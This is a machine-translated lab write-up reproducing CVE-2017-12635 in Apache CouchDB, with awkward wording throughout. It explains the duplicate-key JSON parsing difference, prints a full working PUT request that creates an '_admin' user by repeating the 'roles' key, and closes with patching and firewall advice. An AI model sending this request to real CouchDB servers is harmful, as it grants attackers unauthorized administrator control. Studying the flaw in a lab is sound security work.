Cve-2017-12635 CouchDB vertical privilege bypass vulnerability recurrence

One 、 Summary of vulnerability

Apache CouchDB It's an open source NoSQL database , Focus on ease of use and becoming “ Full hug web The database of ”. It is a use JSON As a data storage format ,javascript As a query language ,MapReduce and HTTP As API Of NoSQL database .

Two 、 Affects version

• Less than 1.7.0 And less than 2.1.1

3、 ... and 、 Loophole principle

　　1.Erlang and JavaScript, Yes JSON Different parsing methods , Cause the difference of statement execution . This vulnerability allows arbitrary users to create administrators , It belongs to vertical privilege bypass vulnerability .——https://www.anquanke.com/post/id/87256

　　2. That means JavaScript At the time of testing , Detect the users we created “ role ＝０”. No role , There is no permission , So there is no harm , The system is judged as safe , Bypassing detection . The next in CouchDB Of Erlang When partially implementing authentication and authorization ,jiffy When it's done ,getter The function returns only the first value, that is "roles": ["_admin"], So we created a system with admin Permission account .——https://blog.csdn.net/qq_45813980/article/details/118654097

　　3. Expand ：PUT request

Four 、 Loophole recurrence environment

Kali Linux + Vulfocus
Infiltration machine ：Kali Linux 
Drone aircraft ：Vulfocus

5、 ... and 、 The experimental steps

1. Open the mirror environment , Access page

2. structure PUT package , Set up an administrator account to log in

 1 PUT /_users/org.couchdb.user:wavesky HTTP/1.1
 2 Host: 192.168.117.131:27483/
 3 Accept: /
 4 Accept-Language: en
 5 User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
 6 Connection: close
 7 Content-Type: application/json
 8 Content-Length: 101
 9 
10 {
11 "type": "user",
12 "name": "wavesky",
13 "roles": ["_admin"],
14 "roles":[],
15 "password": "wavesky"
16 }

3. visit http://192.168.117.131:27483/_utils, You can see _user There is a newly defined user with administrator privileges

6、 ... and 、 Repair suggestions

1. Public network Apache CouchDB example

　　 Upgrade to the latest version is recommended . Use ECS Security group or firewall policy , Limit CouchDB Ports exposed to the Internet , Set fine network access control . Turn on the authentication function , Do not use the default account password , Configure user-defined account and strong password , Prevent brute force attacks .

2. Intranet Apache CouchDB example

　　 Use ECS Security group or firewall policy , Limit CouchDB Ports exposed to the Internet , Set fine network access control . Turn on the authentication function , Do not use the default account password , Configure user-defined account and strong password , Prevent brute force attacks .

——https://huskypower.blog.csdn.net/article/details/120880072?spm=1001.2101.3001.6650.1&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-120880072-blog-121767180.pc_relevant_paycolumn_v3&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-120880072-blog-121767180.pc_relevant_paycolumn_v3&utm_relevant_index=2

3. Join in dedupe_keys Fields are used to identify duplicate keys , rewrite make_object Method , bring jiffy analysis JSON Methods and JavaScript Agreement .——https://www.anquanke.com/post/id/87256